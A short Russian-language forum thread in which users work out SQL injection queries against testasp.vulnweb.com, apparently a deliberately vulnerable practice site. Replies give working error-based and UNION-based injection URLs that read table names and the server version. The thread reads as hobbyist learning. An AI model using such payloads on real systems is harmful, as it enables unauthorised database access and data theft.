Incorrect syntax near the keyword 'AND'
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Incorrect syntax near the keyword 'AND' - 2011-08-31 14:13:44.626666
|
|
|
43l0v3k
Сообщений: 22
Оценки: 0
Присоединился: 2010-06-15 11:20:50.100000
|
Решил попробовать использовать mssql-инъекцию на testasp.vulnweb.com.
Подобрал такой запрос:
http://testasp.vulnweb.com/showthread.asp?id=1+UNION+(SELECT+null,null,null,null)+%00 Но вылезла ошибка:
Incorrect syntax near the keyword 'AND' Что добавить к запросу, чтобы устранить ошибку?
|
|
|
|
|
RE: Incorrect syntax near the keyword 'AND' - 2011-08-31 23:50:35.223333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Эм..
http://testasp.vulnweb.com/showthread.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)–
Ну или
http://testasp.vulnweb.com/showthread.asp?id=-1+union+select+1,2,3,@@version
|
|
|
|
|
RE: Incorrect syntax near the keyword 'AND' - 2011-09-01 08:32:52.456666
|
|
|
Bambilo
Сообщений: 65
Оценки: 0
Присоединился: 2011-07-24 11:49:02.630000
|
А для чего это вообще?
|
|
|
|
|
RE: Incorrect syntax near the keyword 'AND' - 2011-09-01 11:53:42.436666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
http://ru.wikipedia.org/wiki/Внедрение_SQL-кода
|
|
|
|
|
RE: Incorrect syntax near the keyword 'AND' - 2011-09-01 15:27:47.766666
|
|
|
43l0v3k
Сообщений: 22
Оценки: 0
Присоединился: 2010-06-15 11:20:50.100000
|
Спасибо!
P.S. Но работает только error-based запрос :) …
|
|
|
|
|
RE: Incorrect syntax near the keyword 'AND' - 2011-09-01 16:05:27.896666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Почему это? о_О
|
|
|
|
|
RE: Incorrect syntax near the keyword 'AND' - 2011-09-03 15:22:07.930000
|
|
|
43l0v3k
Сообщений: 22
Оценки: 0
Присоединился: 2010-06-15 11:20:50.100000
|
Сорри, не заметил…
|
|
|
|
|
|
